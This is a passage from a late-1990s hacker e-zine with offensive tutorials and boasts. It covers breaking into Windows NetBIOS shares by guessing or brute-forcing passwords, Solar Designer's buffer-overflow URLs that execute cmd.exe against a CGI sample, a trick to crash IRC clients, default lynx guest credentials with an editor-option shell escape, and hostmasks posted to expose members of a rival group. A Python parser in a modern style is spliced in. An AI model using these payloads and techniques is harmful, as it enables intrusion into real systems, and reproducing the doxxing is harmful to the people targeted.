cat > temp2 << STOP    : create a file from a shell here-document, end with a line reading STOP

find
====

usage : find [pathnames] [conditions]

examples :
----------
find $HOME -print : lists files and subdirectories in your home directory.
find /work -name letter -print        : looks for letter, starting its scan in the /work directory
find /work -name 'memo*' -user ann    : looks for any files beginning with memo, owned by ann
find / -size 0 -ok rm {} \;           : looks for, and removes, all files that are 0 bytes; -ok prompts you before each removal

One very good book with such commands in, that I recommend, is...

Linux In A Nutshell
Jessica Hekman
O'Reilly
ISBN 1-56592-167-4
US $19.95 CAN $28.95

so1o

3. Windows NT filesharing basics : chameleon

Now to you NT gurus this is all very basic, but since most of you are Unix hackers you probably don't know shit about Windows. It is a must to start learning Windows now (heh -so1o). NT is getting big. More and more each day people are starting to use it. Yes I agree I hate NT and love a good 'ole Unix box but we must keep up with technology. NT is widely used even by places like the Pentagon. (*cough* it was easy to hack *cough*)

Ok class, let's start...

Say you have an IP address that you want to try and get access to; you would do this...

Example for IP address: 194.8.235.73

Note: Use IP addresses, because the name address sometimes won't work and the IP will, so use IP addresses.

Drop to DOS...

c:\windows> nbtstat -A 194.8.235.73

       NetBIOS Remote Machine Name Table

   Name               Type         Status
---------------------------------------------
MAILGATE       <00>  UNIQUE      Registered
MAILGATE       <03>  UNIQUE      Registered
MAILGATE       <1F>  UNIQUE      Registered
MAILGATE       <20>  UNIQUE      Registered
..__MSBROWSE__.<01>  GROUP       Registered
MIRAGE         <00>  GROUP       Registered
MIRAGE         <1D>  UNIQUE      Registered
MIRAGE         <1E>  GROUP       Registered

MAC Address = 00-00-00-00-00-00

---------------------------------------------------------------------
|Note: this will list the remote host's name. The name is set in the |
|control panel/networking/identification/computer name.              |
---------------------------------------------------------------------

The suffixes in angle brackets tell you what the box is running: <00> UNIQUE is the computer name, <00> GROUP is the workgroup or domain, <03> the messenger service, <1D> the master browser, and <20> the server service, which is the one that means it is actually sharing files. No <20> entry, no shares to connect to.

Now that you have the computer name you need to tell Windows the IP that maps to that computer name.
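Reading the nbtstat table by hand is fine for one host; for a scan you want the suffix decoding automated. The following is an added example, not chameleon's code: it parses the nbtstat -A output format shown above (the sample is a constructed copy of that output), decodes the well-known suffixes from Microsoft's published list (KB 163409), reports whether the <20> server service is registered, and builds the LMHOSTS line the next step of the article has you type.

```python
import re
from typing import Dict, List, Tuple

# Well-known NetBIOS name suffixes (Microsoft KB 163409), keyed by (suffix, type).
SUFFIX_MEANING: Dict[Tuple[str, str], str] = {
    ("00", "UNIQUE"): "Workstation Service (computer name)",
    ("00", "GROUP"): "Workgroup / domain name",
    ("03", "UNIQUE"): "Messenger Service",
    ("1B", "UNIQUE"): "Domain Master Browser",
    ("1C", "GROUP"): "Domain Controllers",
    ("1D", "UNIQUE"): "Master Browser",
    ("1E", "GROUP"): "Browser Service Elections",
    ("1F", "UNIQUE"): "NetDDE Service",
    ("20", "UNIQUE"): "File Server Service (shares offered)",
}

# One row of the name table: name, <suffix>, UNIQUE|GROUP, status.
ROW_RE = re.compile(r"^\s*(\S.*?)\s*<([0-9A-Fa-f]{2})>\s+(UNIQUE|GROUP)\s+(\w+)\s*$")

# Constructed copy of the nbtstat -A output shown in the article.
SAMPLE_NBTSTAT = """\
       NetBIOS Remote Machine Name Table

   Name               Type         Status
---------------------------------------------
MAILGATE       <00>  UNIQUE      Registered
MAILGATE       <03>  UNIQUE      Registered
MAILGATE       <1F>  UNIQUE      Registered
MAILGATE       <20>  UNIQUE      Registered
..__MSBROWSE__.<01>  GROUP       Registered
MIRAGE         <00>  GROUP       Registered
MIRAGE         <1D>  UNIQUE      Registered
MIRAGE         <1E>  GROUP       Registered

MAC Address = 00-00-00-00-00-00
"""


def parse_nbtstat(output: str) -> List[Tuple[str, str, str, str]]:
    """Return (name, suffix, type, status) for every row of the name table."""
    rows = []
    for line in output.splitlines():
        m = ROW_RE.match(line)
        if m:
            name, suffix, kind, status = m.groups()
            rows.append((name, suffix.upper(), kind, status))
    return rows


def summarize(rows: List[Tuple[str, str, str, str]]) -> dict:
    """Pull out the facts the article cares about from the parsed rows."""
    info = {"computer_name": None, "workgroup": None,
            "file_sharing": False, "master_browser": False, "services": []}
    for name, suffix, kind, status in rows:
        if status != "Registered":
            continue
        key = (suffix, kind)
        if key == ("00", "UNIQUE"):
            info["computer_name"] = name
        elif key == ("00", "GROUP"):
            info["workgroup"] = name
        elif key == ("20", "UNIQUE"):
            info["file_sharing"] = True          # server service is up
        elif key == ("1D", "UNIQUE"):
            info["master_browser"] = True
        if key in SUFFIX_MEANING:
            info["services"].append(f"{name}<{suffix}> {SUFFIX_MEANING[key]}")
    return info


def lmhosts_line(ip: str, computer_name: str) -> str:
    """The LMHOSTS entry the article has you add: IP, a tab, the NetBIOS name."""
    if not 1 <= len(computer_name) <= 15:
        raise ValueError("NetBIOS computer names are 1 to 15 characters")
    return f"{ip}\t{computer_name}"


if __name__ == "__main__":
    info = summarize(parse_nbtstat(SAMPLE_NBTSTAT))
    for line in info["services"]:
        print(line)
    print("file sharing:", info["file_sharing"])
    print(lmhosts_line("194.8.235.73", info["computer_name"]))
```

On the sample this reports MAILGATE in workgroup MIRAGE, master browser, with the <20> server service registered, and emits the line 194.8.235.73<tab>MAILGATE ready to paste into LMHOSTS.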
To create that mapping, edit the LMHOSTS file (c:\windows\lmhosts on Windows 95; on NT it lives in %SystemRoot%\system32\drivers\etc\lmhosts; if only lmhosts.sam exists, copy it to lmhosts) in notepad or whatever. It will look like this...

127.0.0.1      localhost

You want to add the IP 194.8.235.73, then press tab and enter the computer name, so the new LMHOSTS file will look like this:

127.0.0.1      localhost
194.8.235.73   MAILGATE

This maps the computer name to the IP address of the computer whose filesharing you are trying to get into. Save this, then click your Start button, go to Find, then Computer, enter the computer name, and it will connect to the computer name that you added into the LMHOSTS file. It should show the computer as being found. (From the command line, net view \\MAILGATE lists its shares and net use x: \\MAILGATE\sharename connects one.) Double click it, and if you're lucky it won't have a password, but if you aren't you will be prompted for a password which you will have to try and guess or use a brute force cracking program.

Solar Designer also coded and distributed some Windows NT and 95 remote buffer overflows (against the win-c-sample.exe CGI shipped with O'Reilly's WebSite server); here are his 2 main examples... the URLs have been split into separate lines so we can see them :

-- WinNT (any version?):

http://website.host/cgi-shl/win-c-sample.exe?+-+-+-+-+-+-+-+-+-+-+-+-
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+h^X%FF%E6%FF%D4%83%C6Lj%01V%8A
%06<_u%03%80.?FAI%84%C0u%F0h0%10%F0wYhM\y[X%050PzPA9%01u%F0%83%E9%10%
FF%D1h0%10%F0wYh%D0PvLX%0500vPA9%01u%F0%83%E9%1C%FF%D1cmd.exe_/c_copy
_\WebSite\readme.1st_\WebSite\htdocs\x1.htm

-- Win95 (the release version only, will crash others!):

http://website.host/cgi-shl/win-c-sample.exe?+-+-+-+-+-+-+-+-+-+-+-+-
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+h^X%FF%E6%FF%D4%83%C62j%01V%8A
%06<_u%03%80.?FAI%84%C0u%F0%BAto|_%B9t`}`%03%CA%FF%D1%BAX_|_%B9XP|`%0
3%CA%FF%D1c:\command.com_/c_copy_\WebSite\readme.1st_\WebSite\htdocs\
x1.htm

You can change the commands in each case, using _ instead of a space.
Note that the server should respond to these exploits with an "Error: no blank line separating header and data", because of the "1 file(s) copied" message appearing without a blank line before it (which is required for HTTP; if you need a command's output, you can redirect it to a file, and get that file via HTTP with a separate request).

Hope this was a little help. If not, at least you know how to use Windows file sharing... Anyone good at coding in Windows? Wanna code a brute force hacking program for Windows file sharing? E-Mail me...

The Chameleon
Chameleon@intercore.com.ar
InterCore Security Corp.
http://chameleon.core.com.ar
http://www.intercore.com.ar

4. BitchX / crackrock bug : so1o / Shok

This is another bug along the lines of the one that causes BitchX clients to segfault if a particular mode is set in a channel.. The bug was originally found by Shok; it's just a quick thing, nothing special, just for novelty value really. This is what you do...

1) join a channel with a { character in the name
2) set the topic to something with more than 20 characters

Now, if anyone using BitchX and crackrock joins your channel, they will segfault and quit; in tests however, this showed to sometimes take a short while (usually about a minute) before they quit..

5. Nifty Lynx trick : Electric Nectar

Ok so you're trying to get a valid account on a server for whatever reasons (busting root, taking a look around, etc.). You've tried telnetting to port 79, 25, and got a couple of valid accounts, and have tried hopelessly to just guess the passwords. This is not the approach to take. Throughout my experience, while trying to gain a valid account on various servers, I've run into many that run a guest lynx account. The purpose of this account is just what it sounds like: it gives no access to the server itself, but rather lets you only run lynx (a unix-based, text only, web browser). The account is designed to be accessed by outsiders.
The most common lynx logins and passwords are:

-lynx/lynx
-guest/guest
-guest/lynx
-www/wwww
-www/lynx

Ok well I think you get the idea; be creative if one doesn't work. First off though, you need to make sure the account exists. Simply telnet to port 79, and try typing in a possible lynx account name. If it verifies it, you're set. Now if 79 isn't open, just telnet to port 25, and type 'vrfy username', username being the name of a guest lynx account. This too can verify the account, with one catch: a reply of 252 rather than 250 is the "cannot VRFY user, but will accept message" code from RFC 1123 section 5.2.3, which is what sendmail gives back when VRFY is restricted, so on its own it confirms nothing; only a 250 reply quoting the address does. Here's an example...

Finger:

Trying...
Connected to host.com
Escape character is '^]'.
lynx
Login name: lynx                        In real life: Lynx Guest Account
Directory: /home/lynx                   Shell: /usr/bin/lynx
No Plan.

Smtp:

Trying...
Connected to host.com
Escape character is '^]'.
220 host.com ESMTP Sendmail 8.8.5/8.8.2; Fri, 3 Oct 1997 19:53:40 -0400
vrfy lynx
252

Now remember, a lynx guest account isn't a common thing on most servers, although I have seen it on quite a few. This is just an alternate plan of getting a shell on an otherwise inaccessible server, if the situation exists. If you cannot validate a guest lynx account, don't be surprised.

Next order of business is to login of course. It should be fairly simple. Since it is a guest lynx account, the login and password should be somewhat obvious; usually the password is the same as the login....

$ telnet host.com
Trying...
Connected to host.com
Escape character is '^]'.

Linux 2.0.29 (host.com) (ttyp0)

Welcome to Linux 2.0.29.

host login: lynx
Password:
Linux 2.0.29.
Last login: Fri Oct 3 17:11:59 on ttyp0 from ppp1.host.com
You have new mail.

...Ok, your terminal should look something like this...

----------------------------------------------------------------------------
Lynx (default page crap here)

_________________________________________________________________
-- press space for next page --
  Arrow keys: Up and Down to move. Right to follow a link; Left to go back.
 H)elp O)ptions P)rint G)o M)ain screen Q)uit /=search [delete]=history list
-----------------------------------------------------------------------------

...Now the following trick is something I developed after several minutes of devising a plan to make lynx pop me into a shell. Now that you are in lynx, hit 'O' for the options menu. Ok, the options menu should come up; let's take a look at it...

-----------------------------------------------------------------------------
                     Options Menu (Lynx Version 2.6)

     E)ditor                       : NONE
     D)ISPLAY variable             : NONE
     B)ookmark file                : lynx_bookmarks.html
     F)TP sort criteria            : By Filename
     P)ersonal mail address        : NONE
     S)earching type               : CASE INSENSITIVE
     display (C)haracter set       : ISO Latin 1
     Raw 8-bit or CJK m(O)de       : ON
     preferred document lan(G)uage : en
     preferred document c(H)arset  : NONE
     V)I keys                      : OFF
     e(M)acs keys                  : OFF
     K)eypad mode                  : Numbers act as arrows
     li(N)e edit style             : Default Binding
     l(I)st directory style        : Mixed style
     sho(W) dot files              : OFF
     U)ser m
ode                    : Novice
     user (A)gent                  : Lynx/2.6 libwww-FM/2.14

Select capital letter of option line, '>' to save, or 'r' to return to Lynx.
-----------------------------------------------------------------------------

Notice the E)ditor option. That's what we're after. The purpose of it is to edit the file currently open in lynx with the supplied text editor. Lynx usually expects you to put in something like joe, pico, vi, etc. But we can supply anything we want, and it will run it through the shell with the syntax: [editor] [file]

Ok, here's where we get innovative. Hit 'E' to type in an editor. For the editor, type: exec. Ah yes, those of experience are now starting to nod their heads. Now hit 'shift+period key' or '>' to save the options. You now return to the default screen.

Next step. Hit 'g'. You will be prompted to enter a URL. For the URL put the following:

file://localhost/bin/sh

If all goes according to plan, /bin/sh will open as binary garbage in lynx.
Now, normally if you hit 'e' with a default text editor set in the options menu, it would edit /bin/sh as a text file. But thanks to our little exec fix, the command lynx hands to the shell is now "exec /bin/sh". And we all know what that does: pops us into a shell (bash on this box, since that is what /bin/sh is on Linux)! Here's an example of the act in progress...

-----------------------------------------------------------------------------
ELF4?4 (444 yyH[1/lib/ld-linux.so.1j5H[&mU dao Qx")Bs|Ng8LW+ST eP{ut!i:@%`Mb9Aq7>=.~ZGFY/O]PcToh"w"~&"`T("X& $H@ Th"""&"" ("G"bxWx<"x<(F*l0j98tBK\R_TfTmTy4libtermcap.so.2strcpyioct
ltgetnum_DYNAMICtgotogetenv__strtol_internalfgetsmemcpymalloctgetflag__environB
C_initwritestrcattputsstrncmpstrncpyreallocPCfopenfclosetgetent_finiatexit_GLOB
AL_OFFSET_TABLE_exitUPstrchrtgetstrfreelibc.so.5__ctype_b__ctype_tolower__ctype
_toupperbzerostrcmpgetpid_xstatgetcwdgetwdstrerrorfcntl_fxstatstrrchrenvironfnm
atchgeteuidgetuidgetgidgetegidkillpgtcflowtcgetpgrptcsetattrtcsetpgrpopensigact
ionsigaddsetsigprocmaskalarmclosegetdtablesizelongjmp__setjmpsigdelsetatoiatolq
sortbcopystrncatgethostnameisattytcgetattrsys_siglistwaitpidgetpeername_lxstate
rrnoclosediropendirreaddirreadaccesschdirdupdup2execveforkgetgroupsgetppidkilll
seekpipesetgidsetuidtimesumaskunlinkgetpgrpgetrlimitsetpgidsetrlimittime__setfp
-- press space for next page --
  Arrow keys: Up and Down to move. Right to follow a link; Left to go back.
bash$ O)ptions P)rint G)o M)ain screen Q)uit /=search [delete]=history list
-----------------------------------------------------------------------------

...If you look in the very bottom left corner you will see it! (bash$) A simple 'clear' command will get rid of the rest of that mess. Often times the TERM setting will be all messed up. Simply fix that by typing:

TERM=vt100
export TERM

And there you have it folks! A bash shell popped off of a lynx guest account. Now feel free to look around, run a few exploits, whatever; what you do beyond here is totally up to you. (If you are the one running such a guest account: this is exactly the hole lynx's -anonymous and -restrictions options exist to close, since they take away the editor option, shell escapes and file:// URLs; a guest account whose shell is a bare /usr/bin/lynx, as in the finger output above, has none of that.)
Hope you enjoyed today's little lesson, and I hope you get a chance to put it to
work sometime. Take it easy all.

6. No-more negative : so1o

Over the last few months, starting roughly in April 1997, myself, D-Storm and a
few others have been playing around with sIn (lame Windows coding group, think
they're all big and bad, when they are really quite cl00le$$). We found out
certain members' names and addresses, as well as hacking their website in
August - www.sinnerz.com (as promised back in April by myself); the hack is
documented at www.hacked.net under the August exploited section. In a way, this
has led to a handful of their members leaving the group after realising how
much they are hated, as well as their webpage being taken down due to the fact
that lameass LordSomer hacked it after we did, so it's not all dandy in the lame
world of sIn after all; it's all falling apart at the seams..

So we have decided that from now on we won't waste our time with this dead
group. They have been proven beyond all doubt to be lame and weak, and now it's
time to let them rest in peace. We have set out what we intended to do, and now
it's over; we proved our point in the end.

Fucking Hostile and The Banshee are the only real members of sIn still around.
They keep changing their nicks on irc to hide their identity, so we have decided
to post their hostmasks, as a final reminder that they will never be forgotten
as the fools they were proven to be..

Fucking Hostile : *!hostile@*.qni.com
The Banshee     : *!bob@*.accessmd1.dataplace.net

so1o

===============================================================================
==[ NEWS ]=====================[ .SECTION E. ]=======================[ NEWS ]==
===============================================================================

1. Pentagon hacked : so1o

chameleon of the carparts crew (#carparts on undernet) used his elite Windows
NT tekneeqs to break into, and modify the .html on...
http://www.pentagon-ai.army.mil

The details of the hack are fully documented on www.hacked.net, under the
October exploited section; notice the greet to CodeZero, heh.

===============================================================================
==[ PROJECTS ]=================[ .SECTION F. ]===================[ PROJECTS ]==
===============================================================================

1. TOTALCON '98 : so1o

$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
                          http://www.aom.co.uk/total/
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$

+------------------------------------+------------------------------------+
   An Official TotalCon Announcement    An Official TotalCon Announcement
   An Official TotalCon Announcement    An Official TotalCon Announcement
+------------------------------------+------------------------------------+

TotalCon '98 is now a reality, here are preliminary details...
==============================================================

Venue         : The Old Firestation, Silver Street, Bristol, ENGLAND

Date          : Late March 1998 (probably the last week)

Duration      : 36 hours non-stop (midday -> 10:00pm next day)

Cost          : 15 (15 UKP) ON THE DOOR, this will go back into the event
                (beer etc.)

What          : 12 system network (with additional terminals) along with full
                internet access, bring your laptops!
                Loud music, live DJ's
                Fully licensed bar downstairs / next door
                Elite UV and spotlighting
                A LOT of cool people
                ^^^^^^^^^^^^^^^^^^^^
                *** NO SPEAKERS WHATSOEVER ***
                *** NO SPEAKERS WHATSOEVER ***

Travel        : Easily accessible by car, train, bus, plane or boat.

Accommodation : You can hang around the Firestation or book one of many good
                hotels in the immediate area.
Notes         : ALL CA$H RAISED AT THE DOOR FROM ENTRANCE FEES WILL GO BACK
                INTO THE EVENT! WE WILL PURCHASE GREAT AMOUNTS OF BEER AND
                FOOD, PROBABLY EVEN A LAPTOP AS A PRIZE!!

$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
                          http://www.aom.co.uk/total/
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$

===============================================================================
==[ FIN ]======================[ .SECTION G. ]========================[ FIN ]==
===============================================================================

.-----------[ An Official ]-----------. : .-----. .----. .--.--. : : : .--' : .-. : : : : : !_-:: : : : `-' ; : . : ::-_! :~-:: :: : :: . : :: : ::-~: : ::.`--. ::.: : ::.: : : : `-----' `--'--' `--'--' : !_-:: ::-_! :~-::-[ Confidence Remains High ]-::-~: :~-:: ::-~: `-----------[ Production ]------------'

w3 r00l, ph34r 0ur tekn33k